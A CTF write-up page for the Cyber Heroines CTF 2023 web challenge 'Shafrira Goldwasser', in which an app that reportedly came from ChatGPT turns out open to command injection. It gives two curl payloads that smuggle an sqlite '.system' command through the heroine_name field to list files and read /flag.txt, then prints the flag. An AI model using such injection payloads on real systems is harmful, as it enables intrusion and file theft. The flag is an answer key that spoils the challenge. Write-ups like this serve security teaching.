🚩
CTF Writeups
  • CTF Writeups
  • CloudSEK 2023 Writeups
    • Bases
    • Serialization Saga
    • The SHA Juggler
  • Cyber Heroines CTF 2023 Writeups
    • crypto
      • Lenore Blum
      • Sophie Wilson
    • forensics
      • Barbara Liskov
      • Elizabeth Feinler
      • Margaret Hamilton
      • Marian Croak
      • Stephanie Wehner
    • pwn
      • Sally Ride
    • re
      • Anita Borg
    • web
      • Frances Allen
      • Grace Hopper
      • Radia Perlman
      • Shafrira Goldwasser
      • Susan Landau
  • DeconstruCTF 2023 Writeups
    • Gibberish
    • Hash Roll
    • MOVE
    • Magicplay
    • Missing
    • Snowy Rock
    • Space Ahoy
    • Two Paths
    • Very Basic
    • gitcha
    • sweet-nothing
    • where-are-the-cookies
    • why-are-types-weird
  • Digital Defenders CTF 2023
  • ISFCR EC CTF 2023 Writeups
    • Base the Bases
    • CrackMe
    • Device
    • Emoji Man
    • Fast Fernet
    • Hands Up
    • Hot and Cold
    • I walk alone
    • Inception
    • Lucky Guess?
    • Mess
      • chal
    • NotFooter
    • Oink Oink v2
    • Oink Oink v0
    • Oink Oink v1
    • STR
    • Seek The Treasure
    • Standard-bearer
    • Tap The Wire
    • Thomas The Train
    • What You See Is (Not) What You Get
    • Where's My Dog?
    • splitXquest
    • Zip Bomb
  • KICyber CTF 2023 Writeups
    • All Hail Hydra
    • Binary Cryptogram - Unravel the Enigma
    • Breakout - Unleash the Flag
    • Cross Platform Hunt
    • CryptoShift - Decipher the Hidden Message
    • Hidden-Network-Quest
    • MetaQuest
    • No remorse, No regret
    • OTP Portal Intrigue
    • Policy-patrol_IAM
    • Secure-Storage-Showdown
    • The-Forbidden-Telnet-Portal
    • Time Traveler's Git (Part 1)
    • Time Traveler_s Git (Part 2)
    • Time-Capsule
    • Unveiling the Hidden Message
    • Welcome to KICyber CTF
    • XORCrypt: Solitary Cipher
    • Zipper is stuck
  • Snyk Fetch The Flag 2023 Writeups
    • Back The Hawks
    • Beep64
    • Finders Keepers
    • Jott
    • Nine-One-Sixteen
    • Protecting Camp
    • Quick Maths
    • Unhackable Andy II
    • Unhackable Andy
  • YCTF Mini 2023 Writeups
    • Cat's Concert 🎧🎵
    • Death Song
    • Enigmatic Vault
    • Fire Accident
    • Military Spy
    • Movie scene
    • OSINT 1
    • OSINT 2
    • Stego Master
    • Twinkle Twinkle
    • Unchained 1
    • Unchained 2
    • Inception
  • flaws.cloud
  • YCTF-Weekly 2023
    • Week-2
      • Web
        • Cookie
        • Confluence
      • Misc
        • Never Found
Powered by GitBook
On this page
  • Description
  • Challenge Link
  • Attachments
  • Solution
  • FLAG
  1. Cyber Heroines CTF 2023 Writeups
  2. web

Shafrira Goldwasser

Last updated 1 year ago

Description

Shafrira Goldwasser (Hebrew: שפרירה גולדווסר; born 1959) is an Israeli-American computer scientist and winner of the Turing Award in 2012. She is the RSA Professor of Electrical Engineering and Computer Science at Massachusetts Institute of Technology; a professor of mathematical sciences at the Weizmann Institute of Science, Israel; the director of the Simons Institute for the Theory of Computing at the University of California, Berkeley; and co-founder and chief scientist of Duality Technologies.

Chal: I asked ChatGPT to make this webapp but I couldnt prove it was secure. In honor of this Turing Award winner, prove it is insecure by returning the flag.

Challenge Link

Attachments

Solution

  • The website let’s us choose a Cyber Heroine and read their biography. The most probable attack vector seems SQLi.

  • It is also vulnerable to command injection. We can use the following payload to list the files in the directory:

curl -X POST -d "heroine_name='\" -cmd \".system 'ls" http://ec2-3-144-228-78.us-east-2.compute.amazonaws.com:6264/

  • The flag is in the root directory of the server

  • To read the flag.txt contents we can use the follwing CURL command

curl -X POST -d "heroine_name='\" -cmd \".system ls -la;cat /flag.txt'" http://ec2-3-144-228-78.us-east-2.compute.amazonaws.com:6264/

FLAG

chctf{CH4ng3d_h0w_w3_th1Nk_of_pr00f$}
URL
webapp.zip